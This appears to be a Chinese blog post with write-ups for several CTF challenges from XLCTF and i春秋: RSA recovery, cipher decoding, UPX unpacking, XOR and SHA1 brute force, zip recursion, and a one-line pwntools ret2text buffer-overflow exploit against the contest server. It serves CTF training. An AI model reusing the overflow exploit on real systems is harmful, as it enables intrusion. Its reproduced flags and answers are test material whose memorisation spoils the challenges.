周报（1.17）_ctf huhstsec-CSDN博客

本文链接：https://blog.csdn.net/lzx13290757580/article/details/145217575

湘岚杯

别呀啦（签到）

直接解压就行

XLCTF{xnnxixixi6-666-666-love}

RSA就是数学口牙（签到）

题目给出p+q，(p+1)(q+1)，e和c。

首先需要求出phi，然后求解d，最后再求解m。

phi = (p-1)(q-1)

= pq - (p+q) + 1

p+q的值题目已经给出了，接下来只需要求出pq的值即可求出phi的值。题目还给出了(p+1)(q+1)，我们考虑下pq是否可以表示为(p+1)(q+1)的形式：

(p+1)(q+1) = pq + p + q + 1

   = pq + (p+q) + 1

那么pq就可以表示为：

pq = (p+1)(q+1) - (p+q) -1

然后，求解phi的值。

phi = (p-1)(q-1)

= pq - (p+q) + 1

= n - (p+q) + 1

import gmpy2

p =#被小男娘偷走了
q =#被小男娘摸走了
n = p * q
phi = (p - 1) * (q - 1)


m =#nian
e = 0xe6b1bee47bd63f615c7d0a43c529d219
d = gmpy2.invert(e, phi)
print(hex(p+q))
print(hex((p+1)*(q+1)))
print(hex(pow(m,e,n)))
0x1232fecb92adead91613e7d9ae5e36fe6bb765317d6ed38ad890b4073539a6231a6620584cea5730b5af83a3e80cf30141282c97be4400e33307573af6b25e2ea
0x5248becef1d925d45705a7302700d6a0ffe5877fddf9451a9c1181c4d82365806085fd86fbaab08b6fc66a967b2566d743c626547203b34ea3fdb1bc06dd3bb765fd8b919e3bd2cb15bc175c9498f9d9a0e216c2dde64d81255fa4c05a1ee619fc1fc505285a239e7bc655ec6605d9693078b800ee80931a7a0c84f33c851740
0x21bfef2961c512fbb81fd75ca1c38cbc810dee21d04de1e749c9a24cc975447acc1098228108f25a5ab4840212b2c0f305aabb17ee6835599425ffeedb85698ff9edbc70d9e87acd5232526304948f806c0283776d3eb217599e06616a12d899b14723bfeb29becb10e464247760f828463eb4f0536244771c648b6445fab855

import gmpy2

# 已知的值
p_add_q_hex = "0x1232fecb92adead91613e7d9ae5e36fe6bb765317d6ed38ad890b4073539a6231a6620584cea5730b5af83a3e80cf30141282c97be4400e33307573af6b25e2ea"
pq_product_plus_one_hex = "0x5248becef1d925d45705a7302700d6a0ffe5877fddf9451a9c1181c4d82365806085fd86fbaab08b6fc66a967b2566d743c626547203b34ea3fdb1bc06dd3bb765fd8b919e3bd2cb15bc175c9498f9d9a0e216c2dde64d81255fa4c05a1ee619fc1fc505285a239e7bc655ec6605d9693078b800ee80931a7a0c84f33c851740"
c_hex = "0x21bfef2961c512fbb81fd75ca1c38cbc810dee21d04de1e749c9a24cc975447acc1098228108f25a5ab4840212b2c0f305aabb17ee6835599425ffeedb85698ff9edbc70d9e87acd5232526304948f806c0283776d3eb217599e06616a12d899b14723bfeb29becb10e464247760f828463eb4f0536244771c648b6445fab855"
e = 0xe6b1bee47bd63f615c7d0a43c529d219

# 将已知的十六进制字符串转换为整数
p_add_q = int(p_add_q_hex, 16)
pq_product_plus_one = int(pq_product_plus_one_hex, 16)
c = int(c_hex, 16)

# 计算 n
n = pq_product_plus_one - p_add_q - 1

# 计算 phi(n)
phi = n - p_add_q + 1

# 计算 d
d = gmpy2.invert(e, phi)

# 解密密文 c
m = pow(c, d, n)

# 将 mpz 对象转换为 int 类型
m_int = int(m)

# 将明文 m 转换为字节
m_bytes = m_int.to_bytes((m_int.bit_length() + 7) // 8, 'big')

# 将字节转换为 ASCII 码
m_ascii = m_bytes.decode('utf-8')

# 打印结果
print(f"p + q: {hex(p_add_q)}")
print(f"(p+1)(q+1): {hex(pq_product_plus_one)}")
print(f"n: {hex(n)}")
print(f"phi(n): {hex(phi)}")
print(f"d: {hex(d)}")
print(f"解密后的明文 m: {hex(m)}")
print(f"解密后的明文 m (ASCII): {m_ascii}")

flag{Aurora_CAL}

你真的懂社会主义核心价值观吗

平等法治自由平等法治爱国自由自由平等公正自由平等平等友善自由和谐法治平等和谐自由爱国平等公正法治平等平等敬业平等法治和谐平等自由法治公正民主平等爱国自由诚信富强法治友善自由公正自由自由平等和谐平等法治公正公正和谐公正诚信和谐和谐民主公正爱国公正文明自由公正平等公正法治平等公正民主平等爱国平等友善自由公正友善公正公正和谐公正友善爱国自由友善爱国法治富强公正自由自由爱国公正友善公正法治富强公正和谐和谐和谐平等诚信富强公正友善公正公正和谐公正友善爱国公正友善公正公正敬业平等友善自由平等法治自由公正和谐民主公正自由自由法治公正诚信文明公正诚信和谐公正自由平等法治法治爱国和谐敬业

base64:

XLCTF{HunanFirstNormalUniversityisverybeautiful}

ret2text签到

忘截屏了就是简单的签到题

from pwn import* p=remote('xlctf.huhstsec.top',22074) payload=b'A'*(0X0A+8)+p64(0x40115A) p.sendline(payload) p.interactive()

ezbase

脱壳，但是不一般的壳，改成55 50 58

f9f2240376ef37e1675052bfc12650e

upx.exe -d ezbase.exe脱壳

密文8CJJ8z918CyC3HtzObOJcov3B2Sh8upqNu6ic/hxZjeJcotz8CkJcoY9

自定义base64密码表:Fvm/RkQucZNVyYABpS2w6enjdtGPO8UalxrbD45Ci07MT9KLEJo1h3zHgfX+WqsI

先异或再base64，逆过来先base64再异或

但是这个不是正确答案；为什么

因为第13和第19个字母换了位置

flag{cfc7cffb-a30e-4ddd-8e80-15ea36ffaa33}

i春秋

简单算术

xor爆破就行

def xor_decrypt(ciphertext, key):
    decrypted = bytearray()
    for byte in ciphertext:
        decrypted.append(byte ^ key)
    return decrypted.decode('utf-8', errors='ignore')

def brute_force(ciphertext):
    for key in range(256):  # 尝试所有可能的单字节密钥
        decrypted_text = xor_decrypt(ciphertext, key)
        if "flag{" in decrypted_text and decrypted_text.endswith('}'):
            print(f"Key: {key}, Decrypted: {decrypted_text}")
            return decrypted_text
    return None

# 将字符串转换为字节序列
ciphertext = "ys~xdg/m@]mjkz@vl@z~lf>b"
ciphertext_bytes = bytes(ciphertext, 'utf-8')

# 执行爆破
result = brute_force(ciphertext_bytes)
if result:
    print("破解成功！")
else:
    print("未找到匹配的密钥。")

flag{x0r_Brute_is_easy!}

通往哈希的旅程

import hashlib

# 截获的哈希值
target_hash = ""

# 生成11位电话号码的范围
start = 18800000000
end = 18899999999

# 遍历所有可能的11位电话号码
for number in range(start, end + 1):
    # 将数字转换为字符串
    number_str = str(number)
    # 计算SHA1哈希值
    hash_object = hashlib.sha1(number_str.encode())
    hash_hex = hash_object.hexdigest()
    # 检查哈希值是否匹配
    if hash_hex == target_hash:
        print(f"找到匹配的号码: {number_str}")
        print(f"提交格式: flag{
 
 {
 
 {number_str}}}")
        break
else:
    print("没有找到匹配的号码")

flag{18876011645}

压力大，写个脚本吧

递归爆破，密码在password中，不过需要base64解码

import os
import zipfile
import base64

def read_password(file_path):
    if not os.path.exists(file_path):
        print(f"文件不存在: {file_path}")
        return None
    with open(file_path, 'r') as file:
        base64_password = file.read().strip()
        password = base64.b64decode(base64_password).decode('utf-8')
    return password

def extract_zip(zip_path, password, extract_to):
    if not os.path.exists(zip_path):
        print(f"压缩包不存在: {zip_path}")
        return
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        zip_ref.extractall(extract_to, pwd=password.encode('utf-8'))

def recursive_extract(base_dir, start_zip, start_password_file):
    current_zip = start_zip
    current_password_file = start_password_file
    n = 99  # 从99开始递减

    while True:
        # 读取密码
        password = read_password(current_password_file)
        if password is None:
            break

        # 解压当前压缩包
        extract_to = os.path.join(base_dir, f"zip_{n}")
        os.makedirs(extract_to, exist_ok=True)
        extract_zip(current_zip, password, extract_to)

        # 更新当前压缩包路径和密码文件路径
        n -= 1
        if n < 0:
            break
        current_zip = os.path.join(base_dir, f"zip_{n+1}", f"zip_{n}.zip")
        current_password_file = os.path.join(base_dir, f"zip_{n+1}", f"password_{n}.txt")

# 基础目录
base_dir = r"E:\练习\zip_100"

# 起始压缩包和密码文件
start_zip = os.path.join(base_dir, "zip_99.zip")
start_password_file = os.path.join(base_dir, "password_99.txt")

# 开始递归解压
recursive_extract(base_dir, start_zip, start_password_file)

FGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFG454E44AE426082FGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFG600119820564081690F13F281EF137ECEB4C7000000000491982056408169021584086600119820564081690215840860564081690215840866001198205640816902158408660010BC8102C20E3F5014B6B805FC21D16902158408660011982112C2043B0800CC10232040BC8102C2043B0800CC102320479EF866524AB8787E67B771EAD9E8CD9F0317D3C5B7300FEC8102C2043B0800CC10232040BC8102C2063F968CE6F184C80B5FA2D8E7F88DFE10E0BC8102C2043B0800CC10232040B102C20E3FC68CEF18984B9D5FFDBFF7EC7F7176C182B393E2043B0800CC10232040BC8102C2043B0800CC10232040BC87BC329BC377F4A7BF5A3F0F78F136C7816DF120AE017112C64081690215840866001199E74FF01C79F811E3EA53D7FC8A1D55B6D6CCD01F849820564081690215840866001198205040BC8383F9AF301EE9FFE797F8489AD39C363989FE3F1E1C8102C2043B0800CC10232040BC8102C2043B0800CC102327FE5CC864F79B85BE8869533C319B21B5613B9C30232040B102C2043B0800CC10232040BC8583E9AF3C8C4C3DCEA73BC4F70C329B8C30232040BC8102C2043B0800CC10232040BC8398FEEDFCA331F3878FF0A1F7005EE3F850FD84973FC22CF2C2043B0800CC10232040BC8102C2043B0800CC10232A6A3C38B7CFF2A900D47B87AE3CC06EEB0800CC10232040BC81032040BC8F833FCFBFBA701E61EE709864B288E3B3EB6F21D0BC8102C2043B0800CC10232040BC8102C2043B0800CC1020F9A1F7F84FAFE237C74FC146E589371DCFC22B8C3023204056408169021584086600119820564081690317DD29DAFF54B747CF3D07176D26C70C3F7C41D169021584086600119820232040BC8102C2043B0808CF35B73868E0F347C3D9DE386C4E88F3B2C2043B0800CC10232040BC8102C2043B0800CC14D1BC70FE0D1F10378747CA4E3F118365CC3E117E9FE01AF040BC8102C2043B0800CC10232040BC8102C2063BA35E7FE3877FC086FF89886E6A7E00E0BC8102C2043B0800CC1023232040BC8780D9FA63FBEB466C350C8C74F75DC3058B3FA7B0BC8102C2043B0800CC10232040BC8102C2043B0800CC1023EF8B261B9C0EA73BC7F426B6EF53E971B9695B8C3023204800CC10232040BC8102C2023309A331CFB383E93311F5B397E034B2800FE112C2043B0800CC10232040BC8102C2043B0D3B11FF0BFFD373C47FEFE1C376C12596DFE296F7885A57F0232040BC8102C2043B0800CC10232040BC8982EA1D8E0FD8DF0E8F897E46BFDE7B8E18BE40E0BC8102C2043B0800CC14086600119820564BC8E6F4C190E1C1C3FFEAF0B66268E4F6101198205640816902158408660011982056408169021581838786FF529DCB02E65F5311CDF3C747C39D3061B66BCDC0232040BC8102C2043B0800CC10232A6A3391B261E866F91B96167CC52B6E600FC24C10232040BC8102C2043B0800CC1C10232A65B731E1D1FB9B87F5DCA86C99BE1BA94FB6D18FD32040BC8102C2043B0800CC10232040BC8102C2043B0800CDA3012717C6AE4FEB996D5EEFFA5DC7F845FEEB08010C1026408169021584086600119AFE13CC186A7F5574F3C1C1F1E6B037758408660011982056408169021584086600119820561AAE3F8CCC4718F5760F54CC6FD97E886EFE1F1AB747C4232040BC8102C2043B0800CC10232040BC8102C20633A9AB30A890D0730BC08C77F08DFE10E0BC8102C2043B0800CC10232A64FBA3F3ABE03E2F8E3BF8F365CA2D58F891FDFD371FF0BC8102C2043B0800CC10232040BC8102C2043B0800CC102CD79EFF8259ABFC58675291FBF356783E317C1D61C807F04B0800CC10232040BC8102C2043B0808CE9D69CE3431B376C3FFD73DC865F8A3B2C2043B0800CC10232040BC8102C204319D3AD39CF6F309E4858BDB466F5017C801B76231DFFA2DE056408169021584086600119820564081690215840866001593D5D74C3453E7E00C38B70C30CD9237758408660011982866001198205644CB7E6CCAD9EBCD9F00AAB77D2CC1D1F2B0119820564081690215840866001198205640816902158408ECF9DCC5F7FC32BAC76FC537874FF01AC767C38E93BDC610232040BC8102C2043B0800CC10232A64B2836CC130C270672FC0813030FEEB0800CC10232040BC8102C2043B0800CC164FC19FEFD86FFED7FF9EBCFDDBF1FE1FEA7B4E77F7EFC7B169021584086600119820564081690215840866001198205C76732568F95FC86752CC767777EC384D686737487056408102C2043B0800CC10232040BC8102C20E3FC68CEEA752973BD347F0B3FB41FE10E0BC8102C2043B0800CC10232040BC80CC10232040BC878FD864D1B67CD673E561FC3F103985B3D0232040BC8102C2043B0800CC10232040BC8102C2043B08069566FB5D97000AB5FE1F8013CBEC27C6EE637FC941EB9C3600119820564081690215840C6F2D19CDF3012F1FE1CE73BC0A7FCC81D169021584086600119820564081690215840860564081690215840C6F9D19CE38329F7B340E1CBECCE377C1D1690215840866001198205640816902158408660011982056478D2FD070CF7231C7F847AC363E2AB2FC2EAFD0B5CC2081690215840866001198205640816902158408660011982E0FD48C486A538C3B7D8B0D7E7D1F02D6E38423670870564102C2043B0800CC10232040BC8102C2043B0808CF3A3391F9F1E6DF89856FBF89FD2973B2C2044B0800CC10232040BC80232968FE63C3A3E72B1DAFC008E4F8DAC9E5EFACE5B0CE7040BC8102C2043B0800CC10232040BC8102C2043B0800CC16FF88C8E4FAE1C3F8047377C4CEF6DB844EEB0800CC1023205644C47731EDD3098F2DE7C24E2FD393EBEFE7C686378910816902158408660011982056408169021584086600119828F697E8EC3233C7E008F86DFA2CF30FF98DC6101198205646001197F867FFF7ABD7EE4386EF6B8A7E3FD45B861CDC7EA198205640816902158408660011982056408169021584086056408169021584086600119820564081690215840866001F5F7EFDF2F8082FF4E1F00C0770916902158408660011982416BD0F7BF72CFB277A281F2FBA41CB1B7445252820B96EBC401952B0E1B000008B949444154789CEDDD4B6EE358100008020000000FDDA19B000000097048597300000EC400000E89504E470D0A1A0A0000000D494844520000019000000190 越看越不会，，，，，

但是89504E470D0A1A0A0000000D494844520000019000000190最后一个有文件头，哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈逆序一下。。。。。。。。。。。。。。。。。。。。。。

import os
import zipfile
import base64

def read_password(file_path):
    if not os.path.exists(file_path):
        print(f"文件不存在: {file_path}")
        return None
    with open(file_path, 'r') as file:
        base64_password = file.read().strip()
        password = base64.b64decode(base64_password).decode('utf-8')
    return password

def extract_zip(zip_path, password, extract_to):
    if not os.path.exists(zip_path):
        print(f"压缩包不存在: {zip_path}")
        return
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        zip_ref.extractall(extract_to, pwd=password.encode('utf-8'))

def recursive_extract(base_dir, start_zip, start_password_file):
    current_zip = start_zip
    current_password_file = start_password_file
    n = 99  # 从99开始递减
    decoded_passwords = []  # 用于收集解码后的密码

    while True:
        # 读取密码
        password = read_password(current_password_file)
        if password is None:
            break

        # 收集解码后的密码
        decoded_passwords.append(password)

        # 解压当前压缩包
        extract_to = os.path.join(base_dir, f"zip_{n}")
        os.makedirs(extract_to, exist_ok=True)
        extract_zip(current_zip, password, extract_to)

        # 更新当前压缩包路径和密码文件路径
        n -= 1
        if n < 0:
            break
        current_zip = os.path.join(base_dir, f"zip_{n+1}", f"zip_{n}.zip")
        current_password_file = os.path.join(base_dir, f"zip_{n+1}", f"password_{n}.txt")

    # 反转列表以得到从password_1到password_100的顺序
    decoded_passwords.reverse()

    # 将所有解码后的密码拼接成一个字符串
    all_passwords = ''.join(decoded_passwords)
    print(f"所有解码后的密码: {all_passwords}")

# 基础目录
base_dir = r"E:\练习\zip_100"

# 起始压缩包和密码文件
start_zip = os.path.join(base_dir, "zip_99.zip")
start_password_file = os.path.join(base_dir, "password_99.txt")

# 开始递归解压
recursive_extract(base_dir, start_zip, start_password_file)

1302b6e3131926e5f8c45977e5772cc